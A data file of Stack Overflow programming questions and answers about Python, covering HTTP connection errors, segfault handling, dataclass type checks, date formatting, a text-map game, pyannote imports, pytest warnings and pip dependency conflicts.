content
stringlengths 85
101k
| title
stringlengths 0
150
| question
stringlengths 15
48k
| answers
sequence | answers_scores
sequence | non_answers
sequence | non_answers_scores
sequence | tags
sequence | name
stringlengths 35
137
|
---|---|---|---|---|---|---|---|---|
Q:
Python requests ConnectionError after few thousands POST requests
im currently working on a python script that executes POST requests a few thousand times to fill dummy data into a database. The POST request sends a string to our backend which fills in this string into the database.
The first 10000 requests are working fine but then a ConnectionError appears.
This is a simplified implementation of my code
sqlfiller.py
import requests
url = "http://localhost:3100/api"
payload = "test"
#40 represents all business-days in two months
for i in range(40):
#600 data entries per day
for i in range(600):
requests.post(url, payload)
As i mentioned, it works fine for a couple thousands POST requests. But sometime this error appears and the program crashes.
Traceback (most recent call last):
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\connection.py", line 174, in _new_conn
conn = connection.create_connection(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\util\connection.py", line 95, in create_connection
raise err
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\util\connection.py", line 85, in create_connection
sock.connect(sa)
OSError: [WinError 10048] Normalerweise darf jede Socketadresse (Protokoll, Netzwerkadresse oder Anschluss) nur jeweils einmal verwendet werden
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\connectionpool.py", line 703, in urlopen
httplib_response = self._make_request(
^^^^^^^^^^^^^^^^^^^
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\connectionpool.py", line 398, in _make_request
conn.request(method, url, **httplib_request_kw)
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\connection.py", line 239, in request
super(HTTPConnection, self).request(method, url, body=body, headers=headers)
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\http\client.py", line 1282, in request
self._send_request(method, url, body, headers, encode_chunked)
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\http\client.py", line 1328, in _send_request
self.endheaders(body, encode_chunked=encode_chunked)
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\http\client.py", line 1277, in endheaders
self._send_output(message_body, encode_chunked=encode_chunked)
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\http\client.py", line 1037, in _send_output
self.send(msg)
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\http\client.py", line 975, in send
self.connect()
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\connection.py", line 205, in connect
conn = self._new_conn()
^^^^^^^^^^^^^^^^
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\connection.py", line 186, in _new_conn
raise NewConnectionError(
urllib3.exceptions.NewConnectionError: <urllib3.connection.HTTPConnection object at 0x0000020309A81250>: Failed to establish a new connection: [WinError 10048] Normalerweise darf jede Socketadresse (Protokoll, Netzwerkadresse oder Anschluss) nur jeweils einmal verwendet werden
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\adapters.py", line 489, in send
resp = conn.urlopen(
^^^^^^^^^^^^^
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\connectionpool.py", line 787, in urlopen
retries = retries.increment(
^^^^^^^^^^^^^^^^^^
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\util\retry.py", line 592, in increment
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='localhost', port=3100): Max retries exceeded with url: /api (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x0000020309A81250>: Failed to establish a new connection: [WinError 10048] Normalerweise darf jede Socketadresse (Protokoll, Netzwerkadresse oder Anschluss) nur jeweils einmal verwendet werden'))
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "D:\Workbench\sqlfiller.py", line 55, in <module>
requests.post(url, payload)
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\api.py", line 115, in post
return request("post", url, data=data, json=json, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\api.py", line 59, in request
return session.request(method=method, url=url, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\sessions.py", line 587, in request
resp = self.send(prep, **send_kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\sessions.py", line 701, in send
r = adapter.send(request, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\adapters.py", line 565, in send
raise ConnectionError(e, request=request)
requests.exceptions.ConnectionError: HTTPConnectionPool(host='localhost', port=3100): Max retries exceeded with url: /api (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x0000020309A81250>: Failed to establish a new connection: [WinError 10048] Normalerweise darf jede Socketadresse (Protokoll, Netzwerkadresse oder Anschluss) nur jeweils einmal verwendet werden'))
This german error line WinError 10048 translates to "Only one usage of each socket address (protocol/network address/port) is normally permitted"
Someone knows whats going on?
Thanks :)
| Python requests ConnectionError after few thousands POST requests | im currently working on a python script that executes POST requests a few thousand times to fill dummy data into a database. The POST request sends a string to our backend which fills in this string into the database.
The first 10000 requests are working fine but then a ConnectionError appears.
This is a simplified implementation of my code
sqlfiller.py
import requests
url = "http://localhost:3100/api"
payload = "test"
#40 represents all business-days in two months
for i in range(40):
#600 data entries per day
for i in range(600):
requests.post(url, payload)
As i mentioned, it works fine for a couple thousands POST requests. But sometime this error appears and the program crashes.
Traceback (most recent call last):
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\connection.py", line 174, in _new_conn
conn = connection.create_connection(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\util\connection.py", line 95, in create_connection
raise err
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\util\connection.py", line 85, in create_connection
sock.connect(sa)
OSError: [WinError 10048] Normalerweise darf jede Socketadresse (Protokoll, Netzwerkadresse oder Anschluss) nur jeweils einmal verwendet werden
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\connectionpool.py", line 703, in urlopen
httplib_response = self._make_request(
^^^^^^^^^^^^^^^^^^^
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\connectionpool.py", line 398, in _make_request
conn.request(method, url, **httplib_request_kw)
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\connection.py", line 239, in request
super(HTTPConnection, self).request(method, url, body=body, headers=headers)
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\http\client.py", line 1282, in request
self._send_request(method, url, body, headers, encode_chunked)
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\http\client.py", line 1328, in _send_request
self.endheaders(body, encode_chunked=encode_chunked)
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\http\client.py", line 1277, in endheaders
self._send_output(message_body, encode_chunked=encode_chunked)
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\http\client.py", line 1037, in _send_output
self.send(msg)
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\http\client.py", line 975, in send
self.connect()
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\connection.py", line 205, in connect
conn = self._new_conn()
^^^^^^^^^^^^^^^^
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\connection.py", line 186, in _new_conn
raise NewConnectionError(
urllib3.exceptions.NewConnectionError: <urllib3.connection.HTTPConnection object at 0x0000020309A81250>: Failed to establish a new connection: [WinError 10048] Normalerweise darf jede Socketadresse (Protokoll, Netzwerkadresse oder Anschluss) nur jeweils einmal verwendet werden
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\adapters.py", line 489, in send
resp = conn.urlopen(
^^^^^^^^^^^^^
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\connectionpool.py", line 787, in urlopen
retries = retries.increment(
^^^^^^^^^^^^^^^^^^
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\urllib3\util\retry.py", line 592, in increment
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='localhost', port=3100): Max retries exceeded with url: /api (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x0000020309A81250>: Failed to establish a new connection: [WinError 10048] Normalerweise darf jede Socketadresse (Protokoll, Netzwerkadresse oder Anschluss) nur jeweils einmal verwendet werden'))
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "D:\Workbench\sqlfiller.py", line 55, in <module>
requests.post(url, payload)
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\api.py", line 115, in post
return request("post", url, data=data, json=json, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\api.py", line 59, in request
return session.request(method=method, url=url, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\sessions.py", line 587, in request
resp = self.send(prep, **send_kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\sessions.py", line 701, in send
r = adapter.send(request, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\adriand\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\adapters.py", line 565, in send
raise ConnectionError(e, request=request)
requests.exceptions.ConnectionError: HTTPConnectionPool(host='localhost', port=3100): Max retries exceeded with url: /api (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x0000020309A81250>: Failed to establish a new connection: [WinError 10048] Normalerweise darf jede Socketadresse (Protokoll, Netzwerkadresse oder Anschluss) nur jeweils einmal verwendet werden'))
This german error line WinError 10048 translates to "Only one usage of each socket address (protocol/network address/port) is normally permitted"
Someone knows whats going on?
Thanks :)
| [] | [] | [
"Instead of request.post use httplib.HTTPConnection(url) with concurrency .\nYou need to change your code,That will definitely help to solve this problem.\n"
] | [
-1
] | [
"nestjs",
"python",
"python_requests"
] | stackoverflow_0074601518_nestjs_python_python_requests.txt |
Q:
How to catch SegFault in Python as exception?
Sometimes Python not only throws exception but also segfaults.
Through many years of my experience with Python I saw many segfaults, half of them where inside binary modules (C libraries, i.e. .so/.pyd files), half of them where inside CPython binary itself.
When segfault is issued then whole Python program finishes with crashdump (or silently). My question is if segfault happens in some block of code or thread is there any chance to catch it as regular Exception through except, and thus preventing whole program from crashing?
It is known that you can use faulthandler, for example through python -q -X faulthandler. Then it creates following dump when segfaults:
>>> import ctypes
>>> ctypes.string_at(0)
Fatal Python error: Segmentation fault
Current thread 0x00007fb899f39700 (most recent call first):
File "/home/python/cpython/Lib/ctypes/__init__.py", line 486 in string_at
File "<stdin>", line 1 in <module>
Segmentation fault
But this dump above finishes program entirely. Instead I want to catch this traceback as some standard Exception.
Another question is whether I can catch segfault of Python code inside C API of PyRun_SimpleString() function?
A:
The simplest way is to have a "parent" process which launches your app process, and check its exit value. -11 means the process received the signal 11 which is SEGFAULTV (cf)
import subprocess
SEGFAULT_PROCESS_RETURNCODE = -11
segfaulting_code = "import ctypes ; ctypes.string_at(0)" # https://codegolf.stackexchange.com/a/4694/115779
try:
subprocess.run(["python3", "-c", segfaulting_code],
check=True)
except subprocess.CalledProcessError as err:
if err.returncode == SEGFAULT_PROCESS_RETURNCODE:
print("probably segfaulted")
else:
print(f"crashed for other reasons: {err.returncode}")
else:
print("ok")
EDIT: here is a reproducible example with a Python dump using the built-in faulthandler :
# file: parent_handler.py
import subprocess
SEGFAULT_PROCESS_RETURNCODE = -11
try:
subprocess.run(["python3", "-m", "dangerous_child.py"],
check=True)
except subprocess.CalledProcessError as err:
if err.returncode == SEGFAULT_PROCESS_RETURNCODE:
print("probably segfaulted")
else:
print(f"crashed for other reasons: {err.returncode}")
else:
print("ok")
# file: dangerous_child.py
import faulthandler
import time
faulthandler.enable() # by default will dump on sys.stderr, but can also print to a regular file
def cause_segfault(): # https://codegolf.stackexchange.com/a/4694/115779
import ctypes
ctypes.string_at(0)
i = 0
while True:
print("everything is fine ...")
time.sleep(1)
i += 1
if i == 5:
print("going to segfault!")
cause_segfault()
everything is fine ...
everything is fine ...
everything is fine ...
everything is fine ...
everything is fine ...
going to segfault!
Fatal Python error: Segmentation fault
Current thread 0x00007f7a9ab35740 (most recent call first):
File "/usr/lib/python3.8/ctypes/__init__.py", line 514 in string_at
File "/home/stack_overflow/dangerous_child.py", line 9 in cause_segfault
File "/home/stack_overflow/dangerous_child.py", line 19 in <module>
File "<frozen importlib._bootstrap>", line 219 in _call_with_frames_removed
File "<frozen importlib._bootstrap_external>", line 848 in exec_module
File "<frozen importlib._bootstrap>", line 671 in _load_unlocked
File "<frozen importlib._bootstrap>", line 975 in _find_and_load_unlocked
File "<frozen importlib._bootstrap>", line 991 in _find_and_load
File "/usr/lib/python3.8/runpy.py", line 111 in _get_module_details
File "/usr/lib/python3.8/runpy.py", line 185 in _run_module_as_main
probably segfaulted
(outputs from both processes got mixed in my terminal, but you can separate them as you like)
That way you can pinpoint the problem was caused by the Python code ctypes.string_at.
But as Mark indicated in the comments, you should not trust this too much, if the program got killed is because it was doing bad things.
| How to catch SegFault in Python as exception? | Sometimes Python not only throws exception but also segfaults.
Through many years of my experience with Python I saw many segfaults, half of them where inside binary modules (C libraries, i.e. .so/.pyd files), half of them where inside CPython binary itself.
When segfault is issued then whole Python program finishes with crashdump (or silently). My question is if segfault happens in some block of code or thread is there any chance to catch it as regular Exception through except, and thus preventing whole program from crashing?
It is known that you can use faulthandler, for example through python -q -X faulthandler. Then it creates following dump when segfaults:
>>> import ctypes
>>> ctypes.string_at(0)
Fatal Python error: Segmentation fault
Current thread 0x00007fb899f39700 (most recent call first):
File "/home/python/cpython/Lib/ctypes/__init__.py", line 486 in string_at
File "<stdin>", line 1 in <module>
Segmentation fault
But this dump above finishes program entirely. Instead I want to catch this traceback as some standard Exception.
Another question is whether I can catch segfault of Python code inside C API of PyRun_SimpleString() function?
| [
"The simplest way is to have a \"parent\" process which launches your app process, and check its exit value. -11 means the process received the signal 11 which is SEGFAULTV (cf)\nimport subprocess\n\nSEGFAULT_PROCESS_RETURNCODE = -11\n\n\nsegfaulting_code = \"import ctypes ; ctypes.string_at(0)\" # https://codegolf.stackexchange.com/a/4694/115779\ntry:\n subprocess.run([\"python3\", \"-c\", segfaulting_code],\n check=True)\nexcept subprocess.CalledProcessError as err:\n if err.returncode == SEGFAULT_PROCESS_RETURNCODE:\n print(\"probably segfaulted\")\n else:\n print(f\"crashed for other reasons: {err.returncode}\")\nelse:\n print(\"ok\")\n\n\nEDIT: here is a reproducible example with a Python dump using the built-in faulthandler :\n# file: parent_handler.py\nimport subprocess\n\nSEGFAULT_PROCESS_RETURNCODE = -11\n\n\ntry:\n subprocess.run([\"python3\", \"-m\", \"dangerous_child.py\"],\n check=True)\nexcept subprocess.CalledProcessError as err:\n if err.returncode == SEGFAULT_PROCESS_RETURNCODE:\n print(\"probably segfaulted\")\n else:\n print(f\"crashed for other reasons: {err.returncode}\")\nelse:\n print(\"ok\")\n\n# file: dangerous_child.py\n\nimport faulthandler\nimport time\n\nfaulthandler.enable() # by default will dump on sys.stderr, but can also print to a regular file\n\n\ndef cause_segfault(): # https://codegolf.stackexchange.com/a/4694/115779\n import ctypes\n ctypes.string_at(0)\n\n\ni = 0\nwhile True:\n print(\"everything is fine ...\")\n time.sleep(1)\n i += 1\n if i == 5:\n print(\"going to segfault!\")\n cause_segfault()\n\neverything is fine ...\neverything is fine ...\neverything is fine ...\neverything is fine ...\neverything is fine ...\ngoing to segfault!\n\nFatal Python error: Segmentation fault\n\nCurrent thread 0x00007f7a9ab35740 (most recent call first):\n File \"/usr/lib/python3.8/ctypes/__init__.py\", line 514 in string_at\n File \"/home/stack_overflow/dangerous_child.py\", line 9 in cause_segfault\n File \"/home/stack_overflow/dangerous_child.py\", line 19 in <module>\n File \"<frozen importlib._bootstrap>\", line 219 in _call_with_frames_removed\n File \"<frozen importlib._bootstrap_external>\", line 848 in exec_module\n File \"<frozen importlib._bootstrap>\", line 671 in _load_unlocked\n File \"<frozen importlib._bootstrap>\", line 975 in _find_and_load_unlocked\n File \"<frozen importlib._bootstrap>\", line 991 in _find_and_load\n File \"/usr/lib/python3.8/runpy.py\", line 111 in _get_module_details\n File \"/usr/lib/python3.8/runpy.py\", line 185 in _run_module_as_main\n\nprobably segfaulted\n\n(outputs from both processes got mixed in my terminal, but you can separate them as you like)\nThat way you can pinpoint the problem was caused by the Python code ctypes.string_at.\nBut as Mark indicated in the comments, you should not trust this too much, if the program got killed is because it was doing bad things.\n"
] | [
1
] | [] | [] | [
"python",
"segmentation_fault"
] | stackoverflow_0074591919_python_segmentation_fault.txt |
Q:
comparing types between a class and a dictionary
I am working with dictionaries and classes and I want to check that the dictionaries and the classes have the same field types.
For example, I have a dataclass of this form
@dataclasses.dataclass
class FlatDataclass:
first_field: str
second_field: int
and I have a dictionary of this form
my_dict={first_field:"a_string", second_field:"5"}
I want to check that the values of the dictionary have the right type for the class.
So far I can get the types for the dictionary, from this:
dct_value_types = list(type(x).__name__ for x in list(dct.values()))
returns
['str', 'str']
however
[f.type for f in dataclasses.fields(klass)]
[<class 'str'>, <class 'int'>]
rather than ['str', 'str'], so I can't compare them.
How would you get the types in a way you can compare them?
A:
Either you do this
[f.type.__name__ for f in dataclasses.fields(klass)]
Or you do this
dct_value_types = list(type(x) for x in list(dct.values()))
Notice that I added or removed __name__ here, so both type checks should either have it or not
A:
You can use this function that checks if all the fields in the dataclass are present in a given dictionary and have same type -
def has_all_fields(d, custom_class):
return all(field.name in d and isinstance(d[field.name], field.type) for field in dataclasses.fields(custom_class))
@dataclasses.dataclass
class FlatDataclass:
first_field: str
second_field: int
my_dict={"first_field":"a_string", "second_field":5}
print(has_all_fields(my_dict, FlatDataclass))
Output:
True
Note that this would still return True if dictionary has more fields than what the dataclass does.
| comparing types between a class and a dictionary | I am working with dictionaries and classes and I want to check that the dictionaries and the classes have the same field types.
For example, I have a dataclass of this form
@dataclasses.dataclass
class FlatDataclass:
first_field: str
second_field: int
and I have a dictionary of this form
my_dict={first_field:"a_string", second_field:"5"}
I want to check that the values of the dictionary have the right type for the class.
So far I can get the types for the dictionary, from this:
dct_value_types = list(type(x).__name__ for x in list(dct.values()))
returns
['str', 'str']
however
[f.type for f in dataclasses.fields(klass)]
[<class 'str'>, <class 'int'>]
rather than ['str', 'str'], so I can't compare them.
How would you get the types in a way you can compare them?
| [
"Either you do this\n[f.type.__name__ for f in dataclasses.fields(klass)]\n\nOr you do this\ndct_value_types = list(type(x) for x in list(dct.values()))\n\nNotice that I added or removed __name__ here, so both type checks should either have it or not\n",
"You can use this function that checks if all the fields in the dataclass are present in a given dictionary and have same type -\ndef has_all_fields(d, custom_class):\n return all(field.name in d and isinstance(d[field.name], field.type) for field in dataclasses.fields(custom_class))\n\n\[email protected]\nclass FlatDataclass:\n first_field: str\n second_field: int\n\nmy_dict={\"first_field\":\"a_string\", \"second_field\":5}\nprint(has_all_fields(my_dict, FlatDataclass))\n\nOutput:\nTrue\n\nNote that this would still return True if dictionary has more fields than what the dataclass does.\n"
] | [
1,
1
] | [] | [] | [
"class",
"dictionary",
"python",
"python_dataclasses"
] | stackoverflow_0074601644_class_dictionary_python_python_dataclasses.txt |
Q:
Date format conversion to text (yyyymmdd)
I have a date in format of YYYY-MM-DD (2022-11-01). I want to convert it to 'YYYYMMDD' format (without hyphen). Pls support.
I tried this...
df['ConvertedDate']= df['DateOfBirth'].dt.strftime('%m/%d/%Y')... but no luck
A:
If I understand correctly, the format mask you should be using with strftime is %Y%m%d:
df["ConvertedDate"] = df["DateOfBirth"].dt.strftime('%Y%m%d')
A:
Pandas itself providing the ability to convert strings to datetime in Pandas dataFrame with desire format.
df['ConvertedDate'] = pd.to_datetime(df['DateOfBirth'], format='%Y-%m-%d').dt.strftime('%Y%m%d')
Referenced Example:
import pandas as pd
values = {'DateOfBirth': ['2021-01-14', '2022-11-01', '2022-11-01']}
df = pd.DataFrame(values)
df['ConvertedDate'] = pd.to_datetime(df['DateOfBirth'], format='%Y-%m-%d').dt.strftime('%Y%m%d')
print (df)
Output:
DateOfBirth ConvertedDate
0 2021-01-14 20210114
1 2022-11-01 20221101
2 2022-11-01 20221101
| Date format conversion to text (yyyymmdd) | I have a date in format of YYYY-MM-DD (2022-11-01). I want to convert it to 'YYYYMMDD' format (without hyphen). Pls support.
I tried this...
df['ConvertedDate']= df['DateOfBirth'].dt.strftime('%m/%d/%Y')... but no luck
| [
"If I understand correctly, the format mask you should be using with strftime is %Y%m%d:\ndf[\"ConvertedDate\"] = df[\"DateOfBirth\"].dt.strftime('%Y%m%d')\n\n",
"Pandas itself providing the ability to convert strings to datetime in Pandas dataFrame with desire format.\ndf['ConvertedDate'] = pd.to_datetime(df['DateOfBirth'], format='%Y-%m-%d').dt.strftime('%Y%m%d')\n\nReferenced Example:\nimport pandas as pd\n\nvalues = {'DateOfBirth': ['2021-01-14', '2022-11-01', '2022-11-01']}\n\ndf = pd.DataFrame(values)\ndf['ConvertedDate'] = pd.to_datetime(df['DateOfBirth'], format='%Y-%m-%d').dt.strftime('%Y%m%d')\n\nprint (df)\n\nOutput:\n DateOfBirth ConvertedDate\n0 2021-01-14 20210114\n1 2022-11-01 20221101\n2 2022-11-01 20221101\n\n"
] | [
0,
0
] | [
"This works\nfrom datetime import datetime \n\ninitial = \"2022-11-01\"\ntime = datetime.strptime(initial, \"%Y-%m-%d\")\nprint(time.strftime(\"%Y%m%d\"))\n\n"
] | [
-1
] | [
"date",
"format",
"python",
"text",
"types"
] | stackoverflow_0074601879_date_format_python_text_types.txt |
Q:
Looping through strings and replacing adjoining characters
I need to know how to switch 2 characters in a string. For example, I have:
###################################
#### ######################
#### ### ### ####
#### ### ### ####
#### ### ####
o ### ##################
###################################
I want this to be like moving throughout the “House” so I have a program that receives an input from the user using WASD keys. When pressing R, the ‘o’ will move towards the right, when pressing ‘W’ it will go up, etc.
Since I want to do that, I would have to switch the ‘o’ with the space to the right, or the ‘o’ with the space on top. Is there a easy, efficient way of doing this? I searched the web and I found some results related but since I’m a beginner I don’t really understand because they were using complicated functions and string slicing. Could somebody give me some code to do this?
I have tried things like:
if input.lower() == ‘w’:
House = ‘’’
###################################
#### ######################
#### ### ### ####
#### ### ### ####
#### ### ####
o ### ##################
###################################
’’’
But it would take me way too long to manually do every single little change in position so can someone make any answer with code in how to do this?
A:
Im assuming you are working with a map thats printed in the terminal
You should think of the house as a 2 dimensional array where the 0s are free space and the 1s are the wall (or the other way around, thats just preference).
That way when you are printing the map you are just printing an empty space, a # or the players marker:
Map =
[
[0,1,0,1,1,1,0,1],
[1,0,0,1,0,1,1,0],
....
]
The position of the player is a position in that array:
Player = [2,5] ## Third Row Sixth Column
Based on that you can calculate where the player can move:
Up: [1,5]
Down: [3,5]
Left: [2,4]
Right: [2,6]
Once the player did his move, print the map again with something that could look like this:
def PrintMap(Map, Player = [0,0]):
for i in Map
Row = ''
for j in i:
if [i, j] == Player:
Row = Row + 'o'
elif j == 0:
Row = Row + ' '
else:
Row = Row + '#'
print(Row)
| Looping through strings and replacing adjoining characters | I need to know how to switch 2 characters in a string. For example, I have:
###################################
#### ######################
#### ### ### ####
#### ### ### ####
#### ### ####
o ### ##################
###################################
I want this to be like moving throughout the “House” so I have a program that receives an input from the user using WASD keys. When pressing R, the ‘o’ will move towards the right, when pressing ‘W’ it will go up, etc.
Since I want to do that, I would have to switch the ‘o’ with the space to the right, or the ‘o’ with the space on top. Is there a easy, efficient way of doing this? I searched the web and I found some results related but since I’m a beginner I don’t really understand because they were using complicated functions and string slicing. Could somebody give me some code to do this?
I have tried things like:
if input.lower() == ‘w’:
House = ‘’’
###################################
#### ######################
#### ### ### ####
#### ### ### ####
#### ### ####
o ### ##################
###################################
’’’
But it would take me way too long to manually do every single little change in position so can someone make any answer with code in how to do this?
| [
"Im assuming you are working with a map thats printed in the terminal\nYou should think of the house as a 2 dimensional array where the 0s are free space and the 1s are the wall (or the other way around, thats just preference).\nThat way when you are printing the map you are just printing an empty space, a # or the players marker:\nMap = \n[\n [0,1,0,1,1,1,0,1],\n [1,0,0,1,0,1,1,0],\n ....\n]\n\nThe position of the player is a position in that array:\nPlayer = [2,5] ## Third Row Sixth Column\n\nBased on that you can calculate where the player can move:\nUp: [1,5]\nDown: [3,5]\nLeft: [2,4]\nRight: [2,6]\n\nOnce the player did his move, print the map again with something that could look like this:\ndef PrintMap(Map, Player = [0,0]):\nfor i in Map\n Row = ''\n for j in i:\n if [i, j] == Player:\n Row = Row + 'o'\n elif j == 0:\n Row = Row + ' '\n else:\n Row = Row + '#' \n print(Row)\n\n"
] | [
0
] | [] | [] | [
"python"
] | stackoverflow_0074601545_python.txt |
Q:
Speaker Diarization
I am trying to do speaker diarization using the pyannote library using the code below:
from pyannote.audio import Pipeline
pipeline = Pipeline.from_pretrained("pyannote/speaker-diarization")
diarization = pipeline("audio.wav")
for turn, _, speaker in diarization.itertracks(yield_label=True):
print(f"start={turn.start:.1f}s stop={turn.end:.1f}s speaker_{speaker}")
However, I am not able to import the package Pipeline, whenever I try to import it in pycharm, I install it but it still gives me the error that it doesn't exist. This is the error message: Cannot find reference 'Pipeline' in 'init.py' Can you help me fix this error?
A:
I was getting the same error.
I fixed it by creating a virtual environment and then importing it there, it worked.
| Speaker Diarization | I am trying to do speaker diarization using the pyannote library using the code below:
from pyannote.audio import Pipeline
pipeline = Pipeline.from_pretrained("pyannote/speaker-diarization")
diarization = pipeline("audio.wav")
for turn, _, speaker in diarization.itertracks(yield_label=True):
print(f"start={turn.start:.1f}s stop={turn.end:.1f}s speaker_{speaker}")
However, I am not able to import the package Pipeline, whenever I try to import it in pycharm, I install it but it still gives me the error that it doesn't exist. This is the error message: Cannot find reference 'Pipeline' in 'init.py' Can you help me fix this error?
| [
"I was getting the same error.\nI fixed it by creating a virtual environment and then importing it there, it worked.\n"
] | [
0
] | [] | [] | [
"python"
] | stackoverflow_0072479844_python.txt |
Q:
How to fix a warning in pytest
I do tests using py test. There is some kind of warning in the terminal, so I could just skip it, but I would like to remove it from the terminal.
RemovedInDjango50Warning: The USE_L10N setting is deprecated. Starting with Djan
go 5.0, localized formatting of data will always be enabled. For example Django will display numbers and dates using the format of the current locale.
warnings.warn(USE_L10N_DEPRECATED_MSG, RemovedInDjango50Warning)
Help me, please!!!!!!
enter image description here
A:
At the top of your Python script, add the following 2 lines of code:
import warnings
warnings.filterwarnings(action="ignore")
This will hide all warnings from the terminal.
Hope this helps :)
A:
It was necessary to add these lines to the project settings:
import warnings
warnings.filterwarnings(action="ignore")
| How to fix a warning in pytest | I do tests using py test. There is some kind of warning in the terminal, so I could just skip it, but I would like to remove it from the terminal.
RemovedInDjango50Warning: The USE_L10N setting is deprecated. Starting with Djan
go 5.0, localized formatting of data will always be enabled. For example Django will display numbers and dates using the format of the current locale.
warnings.warn(USE_L10N_DEPRECATED_MSG, RemovedInDjango50Warning)
Help me, please!!!!!!
enter image description here
| [
"At the top of your Python script, add the following 2 lines of code:\nimport warnings\nwarnings.filterwarnings(action=\"ignore\")\n\nThis will hide all warnings from the terminal.\nHope this helps :)\n",
"It was necessary to add these lines to the project settings:\nimport warnings\nwarnings.filterwarnings(action=\"ignore\")\n\n"
] | [
0,
0
] | [] | [] | [
"django",
"pytest",
"python"
] | stackoverflow_0074601892_django_pytest_python.txt |
Q:
Pip package version conflicts despite seemingly matching ranges
When using pip install -r requirements.txt, I get ERROR: Cannot install -r requirements.txt (line 3), [...] because these package versions have conflicting dependencies..
And further:
The conflict is caused by:
tensorflow 2.11.0 depends on protobuf<3.20 and >=3.9.2
tensorboard 2.11.0 depends on protobuf<4 and >=3.9.2
wandb 0.13.5 depends on protobuf!=4.0.*, !=4.21.0, <5 and >=3.12.0
I don't see any conflicts in these ranges - every version in [3.12.0, 3.20) should be fine. Can someone explain the problem?
Update: As a workaround, I removed all version restrictions and only specified the names of the libraries in the requirements.txt file. Now it works. But I still don't see a problem with the above ranges, so I'll leave the question open.
A:
I would suggest that, rather than using a range of versions, use a specific version you know works. That way, there won't be any problems.
I think that one of the versions of the dependencies is incompatible with the main module, and since it is within the range of versions you ask for, pip tries to intall it and fails to do so since it is incompatible.
Also, pip normally handles dependencies automatically.
